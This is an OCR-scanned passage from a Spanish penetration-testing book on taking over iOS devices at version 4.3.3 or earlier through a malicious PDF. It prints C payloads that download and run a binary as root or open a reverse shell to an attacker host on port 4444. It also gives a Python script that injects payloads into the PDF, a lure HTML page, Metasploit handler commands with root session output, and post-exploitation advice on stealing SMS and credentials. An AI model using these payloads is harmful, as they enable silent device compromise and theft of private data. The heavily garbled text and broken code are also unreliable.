dcsairollai’  una  aplicación  que  realice  las  acciones  que  se  deseen  sin  tener  que  preocupar  se  por  la 
comprobación  de  la  rinria. 

En  este  caso,  para  evitar  tenor  que  reconstruir  el  PDF  para  cada  payhad  diferente  que  se  qurcm 
probar,  se  crearía  una  aplicación  que  descarga  otro  binario  de  una  web,  al  más  puro  estilo  de  la 
conocida  lienaíiiienta  wget.  El  código,  basado  en  wgeí  sortofc  de  Vyachéislav  CroUsEr,  descarga  un 
nuevo  binario  de  la  URJ.  hUp:dejcphií.p&nit:s£er.es/pay¡oad.birj  y  lo  guarda  en.  /ín7p/pwn:me,  para 
luego  ejecutarlo  con  privilegios  de  root.  De  esta  forma  es  posible  cambiar  el  binario payioad.bw  en 
el  senddor  web  para  cainbiEU’  el  compotramiento  que  se  desee  de  los  sistcTnas  comprometidos. 

/  /  D  a  sed  en  v:" et  3  ort  of  .  c  [  Vyaciic  .0 1  a  v  C-o  1  t..sfrr  <3  lavi  kgí^gma  il ,  COn'.> ) 
f  LrkL’_udrj  <M.  .  d  ¡  rj*  h> 

Hn eluda  <sys/“ypes  .  il> 
ítinclude  <sys/3ockez  di> 

#  iiicl  uLÍu  <  n  c  I.  i  ríe t. /  i  n  .  h> 

Ifin-.ludeí  <rLetdh,h> 
linclude  <stdlib  .leri 

#  in  elude  <  le  t  rl:]  e_:  .  ■  ■  > 

#  in  e::  1  i.ide  <uri  i  ñ  t.  d .  d> 

#deí_ne  HOET^'ÍU'-E:  o  '  t .  '^.ent.e.ster  .es" 

#  do  fine  ^JOK■r  fiO 

#defme  FIQUEST  ''GET  /payload .biii  HTTP/ 1  .  t:\r.\n" 

#defma  EAYLOAD  /  L.mp  /  p  ^'n  .  ne 
ifdcfine  MAXARRAY  ISOCOO 
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ii:_  iciainfin-  argCr  ch3.r 

/  /  Zonc.^  c  t  t  o  E- V  í  ■  S  íj:  I-  V  -2  r 
íítruct  scckad<ir_in  s^rx^-^cidr; 

R  t  r  1.  c  I.  \  te  ti  L  e  í  1“  hp ; 
in”  sc::;k_id; 
c  h  a  r  me  3  3  a  ge [ MAX ASKA Y ] ; 

1  n  ; 

char  reqi^Esr;]  =  RF,QtjesT; 

3  0ck  id  =  Socket  ( AF_INET  j  ÍS OC k_STREAI^ ,  0  J  ; 
rr--mFio  .  ' ¿:,?jrjrvad.dr ,  0,  si^eof  {servaddr)  )  ; 
hp  ==  gethCE^  vnanie  [HCST^LAT-íE]  ; 

niemcpy  {  íchar  *  }  £¡servaddr  .  3Ín_addL' .  o_ado <  char  * )  hp->h_dddr.  hp->h_lEinqr.}- )  ; 
se-vaddi: .  L;ln_pozt  ^  htons  ( ?0F.T)  ; 

3E-‘vaddr  .  scn_fair.xly  -  A?  IH¿T; 

CC  rme  cc  { s  ock_:  d  ^  (>j  t.  r  _ic  _  soc  kaddr  í  £  s  s  rvaddr  j.  s  i  zco  f  (  se  r  va  dd  r  ¡  ; 

//  Send  Rcquciit  &  Rece  i  ve  Respense 

wrice  (Ecck_id^  ?-rcíiic’3  1 ,  lí  Lr^en  (requesh) )  ; 

msgler.  =  read  ÍEOck_id,neEsaqE , KAXARRAY)  ; 


//  Open  File  Handle.T- 
FILE  -  pFile; 

pFilÉ  =  ropciLÍ  PAYLCAD,  ); 

//  Ignore  JITTP  Headers 
char  *  ccr:_cii^; 
rnt  CDtler.; 

content  =  strstr  íjr.essage ^  "^\r\ri\ r\rhd  ; 

contERf  á  (cuuLezit  [4 1  )  ; 

cncleri  =  nsglen  +  (Int)  ;.-rie.jEarj0)  -  [inf)  ícontent); 

.//  tirita  h'i  rsl  Pcckets 

íocr.ceti-  ,  :  ,  cnLlcii  ,  pFile  ); 

//  Virite  All  0-her  I'ackets 

un s ql  en  ,  r  cad  ( oc c x_id,  mes S age .  MA>LAPJLAY )  ; 

while  (  msqlnr  !=  0  ) 

{ 

Irrite  ímessage,  1  ^  msglen  ^  pF-ile  )  ; 

:^.E  g  1  en  r  e  a  c  í  o  o  c  Jí:_í  d ,  me  s  s  a  ge ,  MAX  ARRA  Y )  í 

} 


/  /  Clase  H  a  r  d  1  o  r-,s 

cióse (  scck_íd  } ; 

_c_use (  pFile  } ; 

//  Execute  File 

cíkJr.od  :  PAYLOAC,  strtol  {'^0755^,0,8)  }  ; 
syacallí:^};  //  Cive  ne  the  pcwerJl 
e  xe  cvp (  FAYLOAD ,  N  U ¡ ,  I , )  ; 


reciirn 
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Tal  y  como  se  ha  comentado  con  anterioridad,  el  payload  debe  realizar  una  llamada  a  svxcalliü)  para 
elevar  privilegios  a  rooL  gracias  al  manejador  introducido  por  las  etapas  anteriores  de  i  exploit.  En 
caso  de  no  hacerlo,  el  binario  sería  ejecutado  con  los  privilegios  del  usuario  mobile. 

Cuando  se  realicen  este  tipo  de  trabajos,  una  recomendación  es  partir  de  pa^douds  lo  más  sencillos 
posibles  y,  una  vez  comprobado  su  correcto  funcionamiento,  k  aumentando  so  ftincionalidad 
progresivamente  hasta  que  realice  las  acciones  deseadas.  En  este  caso  se  podría  comenzar  por 
crear  una  aplicación  que  escriba  un  fichero  en  un  directorio  temporal,  y  acabar  por  lanza  una  ^he.U 
inversa  al  puerto  4444  del  host  (ixploit.pentp.ster.es,  donde  se  podría  tener  a  la  escucha  un  netcat  o 
Metaspioit. 

líinc'ude  <^stdlo.h> 

^include  <sys/ Lypes , h> 
íiriclude  <sys/so=l<:f^t. 

#Í£icXqde  <ne-inet/in .  h> 

1  inelude  <netd.b,h> 

^includie  <stdlib.í-i> 
liriclude  <3tring.h> 

^include  <iini Eítd . h> 

¡(define  HOSTNAME  "eí<ploit  .pentester ,  es" 

# define  PORT 

#deÍLiie  t'IAXARRAY  15C00C 

inn  msinfint  argcr  char  **argv} 
í 

//  Coiinect  to  Evll  Server 
s  t  r  uc  t  s  n  n  ka  dd  .r.  _i  .t  üij  e  r  v  a  dd  r ; 
atruct  hostent  *hp; 
in^  sock_id? 

C  bar  me  s  ge  [ P-í A  í< ARHAY  ]  ; 
int  msglen; 

s o c k._i d  =  s Q c  ke t  í  A F_I XE T ,  Sü c :k_S t  R KhM ,  C )  ; 
líiemset.  (fiíiervaddrj  Ü,  sizeof  (servaddr)  } ; 
hp  ^  ge  t  h  o  E  th  y  ñame  ( H  Q  S  T  M  A  ME )  ; 

memcpyífchar  ^ )  ítservaddr- £in_addr .  s_addr,  (char  hp->h_addr,  hp->h_len<íth)  ; 
sQTvaddr  .F-r.  n_port  =  hic.n3(PCET)r 
sarvaddr  ,  sin_fc:mily  =  AF_“^fEl; 

corijioqtfsock  id,  (struct  socikaddr  " )  SrErftrvaddr ,  sizeof  (servaddr)  )  ; 

//  Descriptors  te  .SockeL 
//  ¿íeLaid  ( ) ; 
dup2 {  sock_id,  0  ] ; 
dup2 (  Eock_id,  i  ) ; 
dup2('  sock  id,  2  }; 

//  Ejecute  3hel1 

Gxecl{  'Vbln/bash",  'Vbin/cat.",  NULL  )  ,- 


ti  Cióse  Handler 
cioaeí  sockid  ); 
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xrj__irji  íj; 

\ 

Para  lanzar  una  shell  inversa,  una  fonm  sencilla  consiste  en  crear  k  conexión  y  duplicar  los 
descriptores  de  entrada  y  salida  eslándan  y  salida  de  crTt)r  al  socket,  para  posteriormente  lanzar  una 
^hell.  Esto  hace  que  la  información  recibida  por  el transmitida  a  la  sheií,  y  que  la  respuesta 
de  esta  sea  a  su  vez  enviada  por  el  ^'ockes,  con  lo  que  se  tendrá  UR^shelI  inversa  en  toda  regla. 

Estos  y  otros  payioad^i  pueden  ser  descargados  de:  hií/j://ioüls.p^níKS'teKes/‘Jai¡OvmAíe  para  más 
inforiiiaciÓEi.  En  la  acLaalidad  también  pueden  encontrarse  payfoac^s  para  iOS  en  Aíetasploit  {oxv/ 
ajinlf'/sh^lI  rfTi^^rs^  ícpX  aunque  se  ha  probado  con  ellos. 


7.  Resultado  fínal 

Ahora  que  se  conoce  en  qne  parte  del  PDi-  se  guarda  si  payhad  y  que  ya  se  dispone  de  un  paylaacl 
alternativo  que  utilizar,  solo  quedaría  hacer  la  substitución  para  generar  un  nuevo  PDF  un  poco  más 
malicioso  que  el  original  Paia  ello  se  dcHarrolló  un  .script  en  Pyr.kon  que  extrae  ia  información  de 
los  sireams  y  objetos  hasta  llegar  ^Ipayload,  para  luego  sustituirlo  por  el  nuevo  y  realizar  el  proceso 
inverso  hasta  constmir  un  nuevo  PDF, 

r  !  /  .J  L  /  b  i :  ]  /  í  1  y  t  i  1  o  n 

impo L"-  z  1  ib ,r  sy  F.f  re,  .s i  í  i.i  i.! L 

f  Ul  I  bi.ür 

print  '-hi£  ir_f criTiatiGn  is  for  rc.ii-ji.ídrf_iJ:i  ¿iiid  purposes  cnlyl  This  info  is 

iiot  to  be  abusedl  I  ajr.  nct  responsible  for  sriy  rhat;  you  may  í.!jlgü.Le?  ! 

print  .  J  af:.c  Se- 1  v  i  “  j  elvi  3 1  er .  es ' 

if  CJiecxing  ^irgunients 
i.  f  1  G  n  [  F.í  y  ü  ,  rj.  r.  cj  "t }  !  =  4  ; 

print  'Usage;  "  -  fivs .  ^■'-qv[0j  +  '  <Cu:[icx_?DF_Zxpioit  .pd.f>  Olsw  Payioaá ,birL>  <Cut- 

P'jt.pd.f>'' 
e  >i  ¡  '  ; 


pr^nt  'Icput  PDF:  '  i-  sys.argv[lj 

pr'nl  '■TrpjrL  Biiiury  :  '  -E-  sys  , arg\.^  [2  ]  _ _ 

pr^nt  '^Cu.tpuTi  PDF':  '  +  aya.argvíL'ri 

i  Pf.íaí.’.  PDF  Expioit 

pd  f  -  ap^.r\  ( ?;  y ñ  .  a  r  gv  [  I  J  ,  'ib").  i  ü  gU  [  ; 

#  Search  eniod^d  streair, 

—  re .  Rea  rnh  (  '  \r.st  rcaiTiVí]^  ,  pdi] 
etr eaTr,_be gin  =  mi ,  en¿  ( J 

:[l2  =  re  ,  laearch  { '  \nen¿si:rean\n'  ,  pdf  istream_fcegir. :  ] } 
sbreair.  ead  -  mF.atartV)  +  “liL reían  begiii 
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I  i  t  PDF  cciitent 

pdf_beíOi:e  stream  =  pdf  '  í  3tré£:.m_bLígin-l  ] 

pdf  _e:] (i’ody d_ü  _ r can  -  pd f  [  í;  t"^é.ani_héqin  :  st  ream_e r.d ] 

pd  r_a  f  t.er_stream  -  p¿f  [  £  ti:ear:i_er,d  1 1 :  ] 

#  Decode  Sin^aiii 

p{'b  —  "  h  .  Qf^cümpreSÉ  {  pdf_er.ccded  stream  ) 

#  Search  d'jp  J  lliié 

rnl  —  re. .  sear ch  ( ^  Vn/Subrs  ’O-^l-  arzrayVn'  ^  ^fh] 

d’jp_]::sgir.  =  ml.end() 
m2  =  re  -  (  " \iidup 

d-jp  end  -  nL2.£tart(] 


#  Gplit  PFB  C^uteiiL 

[1  i  b  .0  c:í  i'  o  e  d  ■  ]  p  O  —  p  f  b  [ :  dup^beg  i  n  - 1  ] 
pfh_aupC  =  pfb  [diip_begin:  dup  erid] 
pfb  after_dupü  =  pib  [dup_t?jid+_  :  ] 

#  Get  Lengh-  and  encoded  file 

rrd  =  re .  seL'.rcli  (  b.tLip  O  [0-9]+  >;  \  pfb_dupC} 

_ilO-  beqi  n  —  Len  (mi .  group  ( O ) ) 
fíle_end  =  1  en  {pfb  dupCd--^ 

f  Savc  orí  qlr.al  bir.ary 

z_oLdbin  =  pfb  dupO  [:dle  begin  :fils_eiiü 

z  oldtin_leii  =  len  {  z__o_r.ibiii  ) 

^  :^ead  ne^'f  payload 

newbin  =  open  .  arg v  ['?]  r  rh .  read  ( ) 
r-  e.'A.'bT  n_enooded  ^  zlib .  compres  s  (  ne^bin^  9  ) 
r.e’wb i n_l en  =  1  e n  (  ne ’^íb i r. _e nc ode d  ) 

nevbín  enooPcd  ~  r-.CAibi  'i  o.-iocde.d  +  ' \x00 '  { z:_oIdbiri_len-nertbin._^en) 

ri  e  wb  1  r  _1  e  n  -  1  £  n  {  n  e  wb  i  n_e  n  c  ode  d  ) 

#  Create  Bop  0  :Liitrir][j 

plb^dLvpO  -  'dop  n  '  +  £tr  (newbiri_len)  i  ^  x  '  +  nevíbin  eocoacd  +  '  pu  . ' 

#  Creare  Keiv  PFE 

plb  -  pfb_before_dijpO  +  '\n'  +  pfb_dupO  I  '\:n'  ^  pfb_a±  -c:r_dui-:0 

#  Cómprese  P”B  and  Crrja_ij  Waw  PDF 
pü.l_c:ncc'dec_atream  -  zlib .  cómprese  {  pfbjr  D  ) 

p..if  —  pdf  before  stream  '\n''  i  pdt  eiic'oacd_.ot rcan  +  ''\r'  +  pdf_af ter_stream 
opeo { sy s . a  rgv [ 3 ] ^  ' wb ' )  . wri L  o [pd 1 ) 

Comu  ye  puede  apreciar,  es  necesario  que  el  paylorid  introducido  sea  del  mismo  tamaño  que  el 
original,  para  que  el  explail  resulte  ser  funcionai.  Lti  muchos  casos,  los  exploíts  cuciilaii  con  que 
el  pay^Ioad  empleado  tiene  im  tamaño  concreto,  por  lo  que  no  mantenerlo  igual  puede  provocar 
problemas  en  su  ejecución.  En  este  caso,  se  ha  añadido  el  carácLcr  NULL  tras  el  nuevo  payhad 
tantas  veces  cíimti  sean  necesarias  para  que  este  ocupe  el  mismo  espacio  qiic  el  payload  origiiiaL 
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Lo^  payioüds,  pt>r  tsu  parle,  se  pueden  conipilar  con  cualquier  compilador  cruzado  que  penuita 
consmiir  aplicaciones  para  fOS.  Hn  el  caso  de  gec  en  Mac  OS  X,  es  posible  compilarlos  de  k 
siguiente  íbmia: 

'$  qco  -L  /  De '^'cloocL/3-L:taori:\,;¿/  i  PhoneOB  .  platforrri./Develaper/  3DKs/iPñC'neOS4  *  2  .  sdk/usr/ 

I  ib  ”  I  /  Deveieper  /  Piat.  f o  rmp,  /  i  Pho  r-,  cüiS  .  f  j  L  .j.  l  C  :j,r  ni  /  Co  \í  1o£.’  rj  r  /  £D!<e3  / 1  Piin ueOS  4 , 2  .  sdk/  u  3  r/ 
iriclede  arcii  armvT  itithuir.b  paylüad_wgs- .  c  -o  payload^fxrqer. 

í  ge  c  -  L  /  DevÉ  lop^r  /  P 1  s.t.  f  or-nñ  /  i  ^'ho^}oOS  ,  p  1  P  l  ^or  tv/  Oí:-:  'w  c  i  upe  r  /  £  DK  □  /  iPiioneOS  4 . 2 . 3  dk  /  U3  r/ 
lib  -I/Develcper/Platforms/iFbcj]e03  *  plarf  ai:irL/De\^elopsr/£iJ:<s/  i  rbu/reOSl  ,  2  .  í.dK/usr  / 
i  no U' do  -aroh  armi^7  -mlhuiiLu  payi:jad_reversetcp .  c  o  payload  raverssoicp 

El  bmano  payioaá  reversetcp  se  publicaría  en  http;/7exphlLpenie^íer.e^^^'^ayh^  de  Lal  forma 
que  pueda  ser  descalcado  por  el  binario  paylüad_wg(-it^  que  será  el  que  se  introducirá  en  el  PDF 
mcEliante  el  xciipí  en  Pyfhon,  de  k  siguiente  forma: 

?  p  /iOSExploit .  py  ÍFád_4 . 3 . 3_ñL.  2-3  .  rjdf  Pl^  y  1  oad_wqo  I  oxp  fj.i.J.  ,|]dt 

El  nuevo  PDF  también  se  publicaría  en  hnp://expIof Lpmtestcr.es/expioiMxlf  y  tan  solo  quedaría 
preparar  un  indcx.hmi  que,  al  ser  visitado,  cargue  el  PDF  del  expioit.  Lo  ideal  para  una  explotación 
lo  más  satisfactoria  posible  sería  hacer  uii  ieconociiuieütü  de  l/sef^-Agent,  al  igual  que  realizaba 
el  JaiIbreakA4if  3.0^  y  prí^porcionar  a  la  víctima  el  expioit  indicado  para  su  versión  de  IOS.  Sin 
embargo,  como  prueba  de  concepto,  se  puede  asumu  que  se  conoce  a  priori  la  versión  que  se  quiere 
explotar,  con  lo  que  el  HTML  necesario  ptxlría  ser  taii  sencillo  como  sigue: 

<htni2  >  <bcidy>  <h  1:> You. '  r s  c™i:  D  i  <  /  hl  > 

<p><h2>Eut  shnhí'j  n  IL"u  a  ; )  </h2></p> 

<br><br><br><br><br><:hr><br><hr><b  rXb  r  ><b  r-xbf  ><br> 

<b  r  ><  b  r  ><b  r  :>  <b  r  ><  b  r  :><b  r  ><:  br  ><t  r  ><b  r  X  b  r  ><b  r  >  <b  r  ><h  l-> 

<1-  rXb  rXb  r  Xb  -XbrX.urXbi  ><h  rXbrXbr  ><t  r>  <br  ><2::  r  > 

<:brx  br ><b r XbrXbr XbrXbr  Xh  uXh r >  <hr  Xl  j-Xhr  xb  r  > 

Cb  r  ><  b  r  Xb  r  ><b  r  >  <  b  r  ><b  r  >  <br  :>  <b  r  >  <br  >  <  br  >  <b  r  >  <h  r  >  <b  r  > 

<b  r  >  <  b  7'  >  <b  r  >  <b  r  >  <  b  r  ><b  r  ><  b  l  >  <b  r  ><b  -  >  <  br  >  <b  r  >  <b  r  >  <b  r  > 
íit  r  :xbr  XbrXbrXbr  Xbr  Xbr  Xb  r  ><  n  -><h  r  Xh  -Xh  r  X  b  r  > 

<b  rxbrXbr  xbr><br>  cbrxbj;  >  <br><br><br><br><br  Xb  r> 

<1  f-aiíie  &rc-'' e.xpLolL  .yd.i''></if  L&uie> 

<  /  bod  y><  /  h  t  rtil  > 

Eij  csU)s  luomenUís  ya  está  todo  preparado  para  romar  el  control  de  cualquier  dispositivo  IOS  con 
versión  igual  o  inferior  a  4.3.3.  Solo  hay  que  poner  un  netcat  o  Mciasploii  a  la  escucha  en  el  puerto 
4444.  Si  se  desea  eoipleai  Aíi^tasploií.,  es  inipt>rLantc  recordar  pay load  UNIX/sheU/rei^erse  tep 

riü  es  un  payload  nEirmal,  sino  síaged.  Esto  quiere  decir  que,  a!  recibir  una  conexión,  se  envía  el 
stage  sheii  para  que  sea  ejecutado,  y  esto  no  es  lo  que  va  a  esperar  el  payload  que  se  ha  ereailo.  Para 
potiei  Mclusplcfd  a  la  escucha  de  un  payhad  no-síaged  es  necesario  utilizar  el  tipo  adecuado  de 
payload.  F.n  este  caso  se  trataría  del  pa)4oad generic/sheH  reverse  tep^  que  siniplemente  se  pondría 
a  la  escucha  y  actuaría  como  un  ueícetí: 

II  f  >  1  j  í!  t":  rn  ,.j  1  .. .  ■  /  l'i  .-i  [  I  di  c  r 

ms  £  e  xpl  o  i  t  í  handl  e  r )  >  sst  VA'í  LCJA  E )  r  i  n  /  fAi  p.  1 1  _r  r.r.ro  r  .oo  L  c.p 

iLisf  expioit  íharidLerl  :>  sst  LIICCT  C.O.Q.C 
iTi Si  f  X  p  1  o  S  I.  i  ti  a  ri  d '  o  L )  >  c  X  pl  o  i  t 
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msi  eyplDlt{hantíler)  >  exploit 

[*)  Started  reverse  handler  on  0.0.0-0:4444 
[^J  Startlng  the  payload  handler.. . 

[*]  Cófnífiaru:!  síiell  session  5  opened  (192*168.1.10^4444  ->  192.158.1*5:49396)  at  2011-07-23 
64:36:59  -0400 

úname  - a 

Darwin  lPad2- de -Ankara  11*0.0  Darvin  Kernel  Versión  11.0.6:  Wed  Mar  30  13:52:42  PDT  2011; 
mot:ynu-1735.46^10/RELEASE_Aaf1  S5LB940X  iPad2,2  arm  K94AP  Darwln 

id 

uid=0(root)  gid=501(mobile)  groups=5ei([nobile) _ 

f  111  agen  f)ft.09:  Ejecución  dcl  exploir. 


Mientras  se  obtiene  el  control  del  dispositivo  con  privilegios  de  rooi,  el  usuario  no  obsei-va  ninguna 
situación  anómala  en  el  inLerlace,  más  que  !a  visual  i  zacióíi  de  la  página  wch  que  se  haya  preparado, 
que  en  este  caso  da  algunas  pistas  de  que  su  seguridad  puede  haber  sido  comprometida,  pero  que 
podría  no  ser  más  que  una  página  de  noticia,  un  wcbunaíl  de  correo,  o  cualquier  otm  cosa* 


liTuigtííj  OS.  10: 


Esta  vulnerabilidad,  como  ya  se  ha  eoineotado,  solo  aíeciaria  a  versiones  de  iOS  iguales  o  inferiores 
a  4,3.3.  pero  cualquier  vulnerabilidad  que  se  emplee  para  realizar  un c/af/ó/ca^ podría  ser  modificada 
de  una  manera  análoga  para  comprometer  los  dispositivos. 


lodos  los  ficheros  utili/ados  para  esta  explotación  pueden  ser  descargados  desde:  hUp;//tQois. 
pentGstef:  cs/Jai!  (hinMé 
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8.  Postexplotación  en  iOS 

Para  tniichos  usuarios,  el  conseguir  la  sheil  de  rooí  es  en  si  mismo  un  objetivo,  por  la  complejidad 
técnica  qite  puede  Ilegal  a  tener  y  por  lo  que  supone.  El  típico  ''PWNED”  es  la  marca  de  que,  a 
partir  de  ese  irmiTicnEo,  el  sistema  es  del  atacante  y  de  que  este  puede  hacer  con  éllo  que  quiera.  Sin 
embargo,  para  los  atacantes  no  es  más  que  el  principio,  y  es  a  partir  de  aquí  donde  pueden  empezar  a 
hacer  auténticas  “maldades’*.  Para  \i'i^pp.ntpstp.r.s^  es  íílgo  que  deben  realizar  también  para  hacer  ver 
a  los  clientes  el  riesgo  real,  ya  que  para  muchos  de  ellos  ver  una  aLmoliadilla  en  la  pantalla  puede  no 
significar  gran  cosa. 

Dicho  esto,  habiendo  conseguido  privilegios  de  root  en  uir  sistema  iOS.  ..  ¿qué  se  puede  hacer? 
Lo  más  inniediato  es  aplicar  las  mismas  técnicas  que  se  podnaii  usar  eii  un  análisis  forense  del 
dispositivo.  Lvidenteniente,  toda  la  privacidad  de  eorreos,  mensajes  y  mensajeria  como  pudiera  ser 
Whatsapp  o  cualquier  otnj,  quedaría  inmediatamente  comprometida. 

Los  SMS,  por  ejemplo,  son  almacenados  en  una  base  de  datos  SQLííe  en  el  ílchcro  /pHvarpJvar^ 
mobüe/Librar)K/SMS/sms,d^^^  son  visibles  mediante  cualquier  visírr  íle  SOLtíe,  Además,  este  fichero 
puede  ser  utilizado  para,  einpleando  Léenicas  fiircnses,  acceder  incluso  al  contenido  de  los  SMS 
borrados  por  el  usuario.  Esto,  además  del  impacto  para  la  privacidad,  puede  suponer  un  problema 
para  aquellas  aplicaciones  y  senficios  que  reciben  las  credenciales  de  autenticación  vía  SMS,  ya  que 
estas  podiíaii  ser  recuperadas  aunque  hfjyan  sido  debidamente  protegidas  en  su  alniacenaniiento  por 
la  aplicación. 

Otro  tipo  de  información,  como  la  asociada  a  credenciales,  ha  recibido  una  protección  especial 
por  parte  de  Apple  a  través  de  su  funcionalidad  de  "T}ata  Protection"\  Según  dice  la  propia  Apple 
en  su  documento  de  seguridad  de  iOS  ihttp://imagesApptexo}n/iPadtbiismess/does/iOK^^^^ 
Mayll.pdf)^  ha  intentado  conseguir  el  equilibrio  entre  seguridad  y  usabilidad  creando  perfiles  de 
información,  de  tal  modo  que  los  desai rolladorcs  pueden  elegir  el  que  más  convenga  a  su  aplicacióiL 
En  base  a  su  accesibilidad,  se  puede  decir  que  hay  cuatro  tipos  de  inforrii ación; 

-  '"When  Un¡ocke(f"\  La  información  solo  eslará  disponible  cuando  el  sistema  se  encuentra 
desbloqueado,  Es  el  tipo  de  protección  más  completa  y  es  apropiada  para  aquella  que  no 
es  necesario  que  sea  usada  cuando  no  liay  nadie  utilizando  el  dispositivo.  Es  la  usada^  por 
ejemplo,  para  almacén  ai  las  claves  de  Safai^l  o  de  haíiknp  de  iTunes. 

-  "Whíle  Lockecf^i  Solo  aplica  a  ficheros.  Está  perfsada  para  accesos  que  sean  necesarios 
rnicnlras  el  dispositivo  se  encuentra  bloqueado,  para  lo  cual  se  generan  un  par  de  claves 
pública  y  privada  independiente, 

-  a/ier /mí  UiiIaclC:  La  información  no  está  disponible  al  arrancar  el  dispositivo  hasta  que 
se  realiza  el  primer  desbloqueo,  pero  pennanece  disponible  al  realizarse  el  resLo  de  bloqucí)s. 
Este  tipo  de  inibmiación  es  empleada,  por  ejemplo,  para  almacenar  las  claves  de  correo,  ya 
que  se  desea  que  el  dispositivo  siga  recibiendo  correo  aunque  este  se  encuentre  bloqueado, 

-  información  SIEMPRE  se  encuentra  disponible,  independieiitemeiite  del 
estado  del  dispositivo. 
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Item 

Acctsfibift 

Wí*R  passwords 

Afber  fírst  uiílock 

Mail  acccunts 

Afber  finujfikyck 

Bcchar^  accojnts 

After  fínt  imiock: 

VPN  =erdficaGes 

Alw^s,  rkon^mlgramry 

VPN  IJUS^WUI'llü 

Altár  unkck 

LDAECallDAV,ardDAV 

After  fim  «nlock 

Tumi,  backi^p 

'Míen  unlodeiBt^  non-migratory 

Vaittamail 

Ahw^s 

Saliíri  passwards 

When  Lm3ocíw<J 

Bluetooth  keys 

AhraySf  nor-m^ratDrjr 

Apple  Push  Notificatian  Service  Tokan 

norTmqramry 

iCIoud  csrt.ficatesr  and  prívate  keys. 

Alwayí.  nor-m^graíon' 

iHessa£^  keys 

Abvayi.  nori-nil£ramry 

Certifkates  ^nd  prívate  keys  {CoEvfigMratioft 

non- nnljr^Kiry 

SiM  PIN 

Alwgys,  nan-mígratory 

Imagen  Ü8, 1 1 :  FosjíivciJTtA’  y  poUtica  dts  p(riütet.’üió^ 


Pal  a  obtener  acceso  a  esta  infoimacióiipaia  posterionnente  utilizarla  eo  ataques  ñitiiros  es  necesario 
disponer  dcl  IIID  dcl  dispíisitivo,  que  es  direrciite  para  cada  uno  y  no  es  accesible  por  software ,  y  el 
Fasseode  del  usuario.  i¿n  el  caso  de  un  análisis  forense,  el  acceso  físico  da  la  posibilidad  de  emplear 
el  UID  para  desciñar  aunque  se  desconozca  cual  es.  No  obstante,  el  uso  de  esta  clave  de  dispositivo 
hace  que  una  información  cifrada  en  uno  de  estos  no  sea  “exportable”  a  otro  con  una  mera  copia  del 
fichero,  fil  otro  factor  que  sería  necesario  conocen  en  algunos  casos,  es  el  Fasseode.  La  obtención 
de  este  Passcocie^  cuando  no  se  dispone  de  él  suele  ser  uno  de  los  grandes  problemas  en  el  análisis 
forense  de  estos  dispositivos. 


Imagen  ÍÍS.  Í2:  Híitructura  de  iPhonÉ  Düiíü  Pmíealon, 


183 


Capití^h  VIH.  JailChvnMe 


Aunque,  como  se  ha  rncncit)rado,  la  obtención  de  infomiación  del  dispositivo  sería  muy  similar  a 
la  rcali/aeióri  de  un  análisis  forense,  un  atacante  tiene  una  gran  ven  laja  con  respecto  a  un  analista 
forense,  y  es  que  ei  usuario  se  encuentra  Imeiendo  uso  del  dispositivo  mientras  el  atacante  tiene  contiol 
sobre  el  mismo.  Esio  abre  la  posibilidad  de  emplear  una  serie  de  técnicas  que  un  analisLa  forerse 
no  podría  emplear,  como  por  ejemplo  acceder  a  infoimación  mientras  el  dispositivo  se  encuentra 
desbloqueado  y  en  uso,  con  lo  que  se  podria  tener  acceso  a  la  información  con  accesibilidad  "'"W^ten 
Urdocked'\ 

Otra  de  las  Leeriicas  que  se  podrían  emplear  sería,  directamente,  instalar  un  Tap!.ogger  en  el 
dispositivo.  El  TapLoggmg  sigue  un  concepto  idéntico  al  dcl  KeyLoggíng^  con  la  diferencia  de  que 
en  un  dispositivo  iOS  no  hay  teclas  como  tales,  sino  que  hay  que  detectar  la  pulsación  en  la  pantalla 
y  determinar  sobre  que  tecla  se  ha  pulsado.  £u  algunos  casos  se  les  llama  simplemente  KeyLoggers^^ 
aunque  en  realidad  no  se  produzca  ninguna  pulsación  de  teclas,  ‘si  se  busca  en  Cydia  es  posible 
encootiar  soRwaie  de  este  tipo,  aunque  a  dfa  de  hoy  el  autor  de  estas  líneas  desconoce  la  exislencia 
de  alguno  gratuito 

Por  ultimo,  una  de  las  técnicas  túvoritas  de  algunos  usuarios  es  hacer  piggybacking.  El  concepto 
piggybacking  es,  simplemente,  aprovecharse  del  acceso  legítimo  de  luia  pemona  para  obtener 
un  acceso  ilcgílimo.  Tin  ejemplo  cotidiano  de  piggytúcking  suñido  por  cualquier  usuario  que  haya 
utilizado  el  Metro,  podría  darse  cuando  una  persona  se  pega  a  dicho  usuario  de  tal  modo  que,  al 
abrir  la  puerta  con  el  bil lele  legí limo  (con  tomo  es  más  corapiejo),  pasa  tras  el  usuario  antes  de 
que  esta  se  cierre.  Fs  seguridad  informática  el  concepto  es  muy  similar.  En  este  caso,  el  atacante 
esperaría  agazapado  en  la  osenridad  esperando  a  que  el  usuario,  por  ejemplo,  conectara  a  la  VPN 
de  la  organización.  Una  vez  estableciíla  la  conexión,  el  atacante  dispondrá  de  la  misma  vlsiblhdad 
que  lendria  el  usuario  de  forma  legítima,  y  se  abre  la  opción  de  atacar  los  servicios  intrniíis  de  la 
urganizaciórL. 

En penTcster  normalmente  desea  poder  ulilizar  toda  su  artillería  de  exphits  una  vez  que  ha  tomado 
el  control  de  un  dispositivo  iOS,  y  que  mejor  que  usar  Aíetasploit.  Hace  unos  pocos  afios,  CharJie 
MiUer  y  Fícenzo  Lozzo^  dos  de  ios  mayores  expertos  del  mundo  en  seguridad  de  sistemas  iOS, 
presentaban  en  BlackHai  una  charla  llamada  Eyploiíaüon  BHsz:  A^eterpreter  far  ¿PkonB^  en  la 

que  mostiabari  coruí>  era  posible  portar  el  entonces  no-oñcial  Macerpivíer  (Meítrpre/e?^  para  0?^X) 
para  arquitectura  AÍ<.M,  con  lo  que  era  posible  utilizai  lo  en  sistemas  iOS,  ya  que  esTOS  están  basados 
en  la  misma  aiquitectura  OSX. 

Durante  algún  tiempo,  existió  un  MeJerpreter  iXdac  OS  X  oñcialnieote  soportado  por  el  cquipti 
de  tiesarrollo  de  .Metasploit,  pero  en  la  actualidad  no  se  niauticuc  soportada  su  versión  de  OSX  ni  de 
lOS  en  la  rama  oficial.  No  obsLuriLc,  existe  la  posibilidad  de  encontrar  el  código  fuente  en  Internet 
y  adaptarlo  a  un  sistema  iOS  que  sea  más  actual.  Con  este,  u  otro  tipo  de  payloaB,  sí  que  se  tendría 
la  posibilidad  de  utilizar  el  dispositivo  iOS  como  puerta  de  entrada  a  la  organización  y  atacar  los 
sistemas  internos. 
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r*(  rransniltti.'ig  stige  Va]lv« 

